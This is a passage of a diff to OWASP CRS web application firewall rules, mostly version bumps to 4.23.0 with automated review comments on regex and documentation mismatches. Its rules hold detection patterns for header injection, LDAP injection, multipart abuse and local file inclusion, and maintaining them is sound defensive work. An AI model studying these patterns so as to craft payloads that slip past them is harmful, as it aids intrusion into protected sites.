tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\ tag:'capec/1000/210/272',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" 
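Review bot: The chained operand `ARGS:_method "@rx ^[a-z]{3,10}$"` contradicts the comment above it: after `t:lowercase` it matches any value of three to ten letters, including `get`, `post` and `head`, while the comment says the rule fires only when the parameter specifies a potentially dangerous method (DELETE, PUT, PATCH). Either narrow the regex to the methods meant, e.g. `"@rx ^(?:put|patch|delete)$"`, or rewrite the comment to say that any method-override attempt is scored; as written the documentation will mislead anyone tuning the rule. Separately, the gate `SecRule TX:allow_method_override_parameter "@eq 0"` is only evaluated when that TX variable exists, so unless REQUEST-901-INITIALIZATION sets a default the way the other `tx.*` toggles are initialised (this chunk does not show whether the commit does so), the rule is silently inert for deployments whose crs-setup.conf predates 900210. The header comment `# -=[ Rule 920650: HTTP Method Override via _method Parameter ]=-` and the bare `# References:` also depart from the `# -=[ Rule Logic ]=-` / `# -=[ References ]=-` layout used elsewhere in the file.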
@@ -1570,7 +1707,7 @@ SecRule &REQUEST_HEADERS:Accept "@eq 0" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
 tag:'capec/1000/210/272',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'NOTICE',\
 chain"
 SecRule REQUEST_METHOD "!@rx ^(?:OPTIONS|CONNECT)$" \
@@ -1604,7 +1741,7 @@ SecRule &REQUEST_HEADERS:x-up-devcap-post-charset "@ge 1" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
 tag:'capec/1000/210/272',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 chain"
 SecRule REQUEST_HEADERS:User-Agent "@rx ^(?i)up" \
@@ -1658,7 +1795,7 @@ SecRule &REQUEST_HEADERS:Cache-Control "@gt 0" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
 tag:'capec/1000/210/272',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 chain"
 SecRule REQUEST_HEADERS:Cache-Control "!@rx ^(?:(?:max-age=[0-9]+|min-fresh=[0-9]+|no-cache|no-store|no-transform|only-if-cached|max-stale(?:=[0-9]+)?)(?:\s*\,\s*|$)){1,7}$" \
@@ -1689,12 +1826,12 @@ SecRule REQUEST_HEADERS:Accept-Encoding "!@rx br|compress|deflate|(?:pack200-)?g
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
 tag:'capec/1000/255/153',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:920018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
@@ -1718,10 +1855,10 @@ SecRule REQUEST_BASENAME "@endsWith .pdf" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
 tag:'capec/1000/210/272',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'WARNING',\
 chain"
- SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \
+ SecRule REQUEST_HEADERS:Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \
 "setvar:'tx.inbound_anomaly_score_pl4=+%{tx.warning_anomaly_score}'"
@@ -1746,7 +1883,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 38,44-46,48-58,61,65-90
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
 tag:'capec/1000/210/272',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
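Review bot: The chained rule in the `@@ -1718,10 +1855,10 @@` hunk drops `REQUEST_HEADERS:Request-Range` from its target list without saying why, and the rule's header comment and msg, which sit outside the hunk, may still describe both headers. A one-line comment above the chained rule, e.g. `# Only Range is inspected here; Request-Range was dropped because <reason>`, would keep the next reader from re-adding it, and the header comment should be checked for a stale mention of the pair.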
@@ -1768,7 +1905,7 @@ SecRule REQUEST_HEADERS|!REQUEST_HEADERS:User-Agent|!REQUEST_HEADERS:Referer|!RE
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
 tag:'capec/1000/210/272',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
@@ -1795,7 +1932,7 @@ SecRule REQUEST_HEADERS:Sec-Fetch-User|REQUEST_HEADERS:Sec-CH-UA-Mobile "!@rx ^(
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
 tag:'capec/1000/210/272',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
@@ -1840,7 +1977,7 @@ SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?:^|[^\x5c])\x5c[cdegh
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ENFORCEMENT',\
 tag:'capec/1000/153/267',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
diff --git a/rules/REQUEST-921-PROTOCOL-ATTACK.conf b/rules/REQUEST-921-PROTOCOL-ATTACK.conf
index 697d2335c7..29480e8ff4 100644
--- a/rules/REQUEST-921-PROTOCOL-ATTACK.conf
+++ b/rules/REQUEST-921-PROTOCOL-ATTACK.conf
@@ -1,5 +1,5 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.22.0
+# OWASP CRS ver.4.23.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 # Copyright (c) 2021-2026 CRS project. All rights reserved.
 #
@@ -14,8 +14,8 @@
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:921012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -47,7 +47,7 @@ SecRule ARGS_NAMES|ARGS|REQUEST_BODY|XML:/* "@rx (?:get|post|head|options|connec
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ATTACK',\
 tag:'capec/1000/210/272/220/33',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -80,7 +80,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx [\r\n]
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ATTACK',\
 tag:'capec/1000/210/272/220/34',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -102,7 +102,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\bh
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ATTACK',\
 tag:'capec/1000/210/272/220/34',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -137,7 +137,7 @@ SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ATTACK',\
 tag:'capec/1000/210/272/220/273',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -166,7 +166,7 @@ SecRule ARGS_NAMES "@rx [\n\r]" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ATTACK',\
 tag:'capec/1000/210/272/220/33',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -188,7 +188,7 @@ SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cook
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ATTACK',\
 tag:'capec/1000/210/272/220/33',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -216,7 +216,7 @@ SecRule REQUEST_FILENAME "@rx [\n\r]" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ATTACK',\
 tag:'capec/1000/210/272/220/34',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -235,7 +235,7 @@ SecRule REQUEST_FILENAME "@rx [\n\r]" \
 # * https://www.sonarsource.com/blog/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/
 # * https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/276#issue-126581660
-SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^[^:\(\)\&\|\!<>\~]*\)\s*(?:\((?:[^,\(\)\=\&\|\!<>\~]+[><~]?=|\s*[&!|]\s*(?:\)|\()?\s*)|\)\s*\(\s*[\&\|\!]\s*|[&!|]\s*\([^\(\)\=\&\|\!<>\~]+[><~]?=[^:\(\)\&\|\!<>\~]*)" \
+SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^[^!&\(\):<>\|~]*\)[\s\x0b]*(?:\((?:[^!&\(\),<->\|~]+[<>~]?=|[\s\x0b]*[!&\|][\s\x0b]*[\(\)]?[\s\x0b]*)|\)[\s\x0b]*\([\s\x0b]*[!&\|][\s\x0b]*|[!&\|][\s\x0b]*\([^!&\(\),<->\|~]+[<>~]?=[^!&\(\):<>\|~]*)" \
 "id:921200,\
 phase:2,\
 block,\
@@ -250,7 +250,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^[^:\(
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ATTACK',\
 tag:'capec/1000/152/248/136',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -283,7 +283,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\x0b,;]+[\s\x0b,;].*?(?:applicati
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ATTACK',\
 tag:'capec/1000/255/153',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -310,7 +310,7 @@ SecRule REQUEST_URI_RAW "@rx unix:[^|]*\|" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ATTACK',\
 tag:'capec/1000/210/272/220/33',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
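Review bot: The rewritten 921200 expression is slightly stricter in its third alternative: the attribute class `[^!&\(\),<->\|~]+` there now also excludes `,`, which the old `[^\(\)\=\&\|\!<>\~]+` allowed, so an injected filter whose attribute name contains a comma no longer matches via that branch; this probably comes from a shared class in the assembly source, but it is a behaviour change and deserves a regression test. The range `<->` inside the classes is correct (it spans `<`, `=`, `>`) but reads like a typo, so if the expression is produced from a regex-assembly file, a line such as `# Regular expression generated from regex-assembly/921200.ra.` above the rule, as this diff shows for 931131, would make clear that the rule text is not hand-edited (unless one already sits above the visible context). The rule's action block continues outside this hunk.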
@@ -338,13 +338,13 @@ SecRule REQUEST_COOKIES:/\x22?\x24Version/ "@streq 1" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ATTACK',\
 tag:'capec/1000/210/272/220/33',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
@@ -372,7 +372,7 @@ SecRule ARGS_GET "@rx [\n\r]" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ATTACK',\
 tag:'capec/1000/210/272/220/33',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -408,13 +408,13 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\x0b,;]+[\s\x0b,;].*?\b(?:((?:tex
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ATTACK',\
 tag:'capec/1000/255/153',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
@@ -445,7 +445,7 @@ SecRule &REQUEST_HEADERS:Range "@gt 0" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ATTACK',\
 tag:'capec/1000/210/272/220',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -483,7 +483,7 @@ SecRule ARGS_NAMES "@rx ." \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ATTACK',\
 tag:'capec/1000/152/137/15/460',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 setvar:'TX.paramcounter_%{MATCHED_VAR_NAME}=+1'"
 SecRule TX:/paramcounter_.*/ "@gt 1" \
@@ -500,7 +500,7 @@ SecRule TX:/paramcounter_.*/ "@gt 1" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ATTACK',\
 tag:'capec/1000/152/137/15/460',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -544,15 +544,15 @@ SecRule ARGS_NAMES "@rx (][^\]]+$|][^\]]+\[)" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ATTACK',\
 tag:'capec/1000/152/137/15/460',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
@@ -595,7 +595,7 @@ SecRule ARGS_NAMES "@rx \[" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/PROTOCOL-ATTACK',\
 tag:'capec/1000/152/137/15/460',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'"
diff --git a/rules/REQUEST-922-MULTIPART-ATTACK.conf b/rules/REQUEST-922-MULTIPART-ATTACK.conf
index 71a5ceda7d..7005d9cb18 100644
--- a/rules/REQUEST-922-MULTIPART-ATTACK.conf
+++ b/rules/REQUEST-922-MULTIPART-ATTACK.conf
@@ -1,5 +1,5 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.22.0
+# OWASP CRS ver.4.23.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 # Copyright (c) 2021-2026 CRS project. All rights reserved.
 #
@@ -39,7 +39,7 @@ SecRule &MULTIPART_PART_HEADERS:_charset_ "!@eq 0" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/MULTIPART-ATTACK',\
 tag:'capec/1000/255/153',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.922100_charset=|%{ARGS._charset_}|',\
 chain"
@@ -67,7 +67,7 @@ SecRule &MULTIPART_PART_HEADERS "@gt 0" \
 tag:'attack-multipart-header',\
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/MULTIPART-ATTACK',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 setvar:'tx.multipart_headers_content_counter=0'"
 SecRule MULTIPART_PART_HEADERS "@rx ^content-type\s*:\s*(.*)$" \
@@ -80,7 +80,7 @@ SecRule MULTIPART_PART_HEADERS "@rx ^content-type\s*:\s*(.*)$" \
 tag:'attack-multipart-header',\
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/MULTIPART-ATTACK',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 setvar:'tx.multipart_headers_content_types_%{tx.multipart_headers_content_counter}=%{tx.1}',\
 setvar:'tx.multipart_headers_content_counter=+1'"
@@ -105,7 +105,7 @@ SecRule TX:/MULTIPART_HEADERS_CONTENT_TYPES_*/ "!@rx ^(?:(?:\*|[^!\"\(\),/:-\?\[
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/MULTIPART-ATTACK',\
 tag:'capec/272/220',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -128,7 +128,7 @@ SecRule MULTIPART_PART_HEADERS "@rx content-transfer-encoding:(.*)" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/MULTIPART-ATTACK',\
 tag:'capec/272/220',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -152,6 +152,6 @@ SecRule MULTIPART_PART_HEADERS "@rx [^\x21-\x7E][\x21-\x39\x3B-\x7E]*:" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/MULTIPART-ATTACK',\
 tag:'capec/272/220',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
diff --git a/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf b/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
index 36d69c27bc..1ef1ce6b3b 100644
--- a/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
+++ b/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf
@@ -1,5 +1,5 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.22.0
+# OWASP CRS ver.4.23.0
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
 # Copyright (c) 2021-2026 CRS project. All rights reserved.
 #
@@ -14,8 +14,8 @@
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
@@ -48,7 +48,7 @@ SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-LFI',\
 tag:'capec/1000/255/153/126',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
 setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'"
@@ -81,7 +81,7 @@ SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML:
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-LFI',\
 tag:'capec/1000/255/153/126',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 multiMatch,\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
@@ -112,7 +112,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFil
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-LFI',\
 tag:'capec/1000/255/153/126',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -139,15 +139,14 @@ SecRule REQUEST_FILENAME "@pmFromFile restricted-files.data" \
 tag:'OWASP_CRS',\
 tag:'OWASP_CRS/ATTACK-LFI',\
 tag:'capec/1000/255/153/126',\
- ver:'OWASP_CRS/4.22.0',\
+ ver:'OWASP_CRS/4.23.0',\
 severity:'CRITICAL',\
 setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
 setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-
